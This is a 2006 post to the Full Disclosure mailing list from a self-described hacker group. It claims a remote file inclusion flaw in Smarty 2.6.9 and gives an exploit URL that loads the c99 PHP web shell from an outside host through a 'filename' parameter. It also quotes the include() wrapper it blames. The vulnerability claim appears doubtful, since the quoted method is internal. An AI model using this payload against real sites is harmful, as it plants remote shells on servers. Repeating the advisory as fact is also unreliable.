Full Disclosure mailing list archives

Vuln


From: "hitham hitham" <sp1der_net () hotmail com>
Date: Sat, 14 Oct 2006 16:25:16 +0000

Hi I find a new vuln ...

the vuln :-

#########################################################

# Auother :- Sp1deR_NeT

# E-mail :- Sp1deR_Net () Hotmail Com

# Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com

# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .

#########################################################

Script :- Smarty-2.6.9

Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?

Vuln Code :-
 /**
    * wrapper for include() retaining $this
    * @return mixed
    */
   function _include($filename, $once=false, $params=null)
   {
       if ($once) {
           return include_once($filename);
       } else {
           return include($filename);
       }
   }
---------------------------------------------

Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.

---------------------------------------------

WwW.Sp1deR-N3T.Com ///\\\///\\\

=============Sp1deR_Net () Hotmail Com==============

!@!@!@!@!@!

_________________________________________________________________
Windows LiveĀ™ Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: